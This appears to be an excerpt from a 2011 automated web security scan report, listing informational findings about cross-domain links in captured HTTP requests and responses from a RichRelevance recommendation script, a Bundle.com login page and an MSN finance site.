Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848435597&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848419997.21158348%7C; pvihc=b73.1303848419997.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:07:06 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848426329.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848426329.21158348%7C; Expires=Fri, 23-Apr-2021 20:07:06 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19239

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p12484463-160547S.JPG" alt="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160547&MaterialNumber=12484463&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160547" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160547&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
homson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p11634476-159396S.JPG" alt="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159396&MaterialNumber=11634476&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
4%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p15401674-160396S.JPG" alt="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160396&MaterialNumber=15401674&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160396%2F15401674%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Law Manual, 5th, 2010-2 ed."><img src="http://images.west.thomson.com/store/product_photos/p14862747-175579S.JPG" alt="Bankruptcy Law Manual, 5th, 2010-2 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=175579&MaterialNumber=14862747&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn175579" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
ugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice Handbook, 2d"><img src="http://images.west.thomson.com/store/product_photos/p13972135-2808S.jpg" alt="Bankruptcy Practice Handbook, 2d" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2808&MaterialNumber=13972135&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2808" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
A%2F%2Fwest.thomson.com%2Fproductdetail%2F175908%2F13972003%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice for the General Practitioner, 3d, 2010 ed."><img src="http://images.west.thomson.com/store/product_photos/p13972003-175908S.JPG" alt="Bankruptcy Practice for the General Practitioner, 3d, 2010 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=175908&MaterialNumber=13972003&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn175908" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45fe38fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=175908&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175908%2F13972003%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.107. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848211573&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=3d67d3c1-f356-442c-f616-e44be4d19914

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:23 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848203781.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848203781.21158348%7C; Expires=Fri, 23-Apr-2021 20:03:23 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19174

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
4%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p15401674-160396S.JPG" alt="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160396&MaterialNumber=15401674&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=160396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160396%2F15401674%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Law Manual, 5th, 2010-2 ed."><img src="http://images.west.thomson.com/store/product_photos/p14862747-175579S.JPG" alt="Bankruptcy Law Manual, 5th, 2010-2 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=175579&MaterialNumber=14862747&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn175579" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
wh5oouwn&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice Handbook, 2d"><img src="http://images.west.thomson.com/store/product_photos/p13972135-2808S.jpg" alt="Bankruptcy Practice Handbook, 2d" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2808&MaterialNumber=13972135&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2808" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
oductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159383&MaterialNumber=40121151&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159383" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=159383&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Mortgage and Asset Backed Securities Litigation Handbook"><img src="http://images.west.thomson.com/store/product_photos/p40711471-146955S.JPG" alt="Mortgage and Asset Backed Securities Litigation Handbook" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=146955&MaterialNumber=40711471&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn146955" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=146955&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
2Fwest.thomson.com%2Fproductdetail%2F146377%2F40646555%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Scalia and Garner\'s Making Your Case: The Art of Persuading Judges"><img src="http://images.west.thomson.com/store/product_photos/p40646555-146377S.JPG" alt="Scalia and Garner\'s Making Your Case: The Art of Persuading Judges" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=146377&MaterialNumber=40646555&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn146377" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=339238fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=146377&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146377%2F40646555%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.108. https://secure.bundle.com/Membership/LogOn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /Membership/LogOn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Membership/LogOn?returnurl=%2Fmsn%2FLoggedIn HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc; rfr=none%7CBundle%3A%20The%20No.%201%20Source%20for%20How%20People%20Spend%20and%20Save%20Money%20--%20Personal%20Finance%20Data%2C%20Money%20Advice%2C%20Trends%2C%20News%20and%20Community%3A%20https%3A%2F%2Fsecure.bundle.com%2Fmsn

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:45:33 GMT
Connection: keep-alive
Set-Cookie: __RequestVerificationToken_Lw__=HnsJb5DxR3JsrwADkF6kOt9xVMG7yhpZzwkhG1bAranocdXh1p+yqmWZxRuF9mgi; path=/; HttpOnly
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Content-Length: 14062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div class="truste">
<a href="//privacy-policy.truste.com/click-with-confidence/wps/en/www.bundle.com/seal_m" title="TRUSTe online privacy certification" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/wps/en/www.bundle.com/seal_l.png" alt="TRUSTe online privacy certification"/></a>
...[SNIP]...
<div class="logon-verisign">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=secure.bundle.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

19.109. http://theinvestedlife.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://theinvestedlife.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?source=msnmoney HTTP/1.1
Host: theinvestedlife.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=290
Content-Length: 29567
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:43:58 GMT
Last-Modified: Tue, 26 Apr 2011 18:28:58 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:39:08 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
<noscript><iframe style="position:absolute" src="http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=1?" width="1" height="0" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://www.bltwy.com/" target="_blank">BLTWY</a>
...[SNIP]...
<li class="menuItem"><a href="http://msn.foxsports.com/" target="_blank">Sports</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb" target="_blank">MLB</a></li><li><a href="http://msn.foxsports.com/nascar " target="_blank">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" target="_blank">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" target="_blank">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" target="_blank">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" target="_blank">NFL</a></li><li><a href="http://msn.foxsports.com/nhl" target="_blank">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" target="_blank">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" target="_blank">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp" target="_blank">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx" target="_blank">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " target="_blank"> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" target="_blank">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" target="_blank">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com" target="_blank">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" target="_blank">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" target="_blank">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " target="_blank">Travel</a>
...[SNIP]...
</div><a href="http://www.bing.com/" id="bingLogo" target="_blank">Bing</a></div><div id="msnHeaderRight"><a href="http://mail.live.com/" id="hotmailLink" class="divRight" target="_blank">Hotmail</a><a href="http://download.live.com/?sku=messenger" id="messengerLink" target="_blank">Messenger</a>
...[SNIP]...
<div id="tdaLogo"><a href="http://ad.doubleclick.net/clk;228891279;51205649;t" target="_blank" ><img src="http://blstb.msn.com/i/4D/B7C87BC03E7E59C973DC6F7A93D0F4.png" title="The Invested Life" alt="The Invested Life"/>
...[SNIP]...
</div><a href="http://twitter.com/theinvestedlife" title="Follow Us" target="_blank" >Follow Us</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a href="http://help.live.com/help.aspx?project=tou" target="_blank">Terms of Use</a>
...[SNIP]...
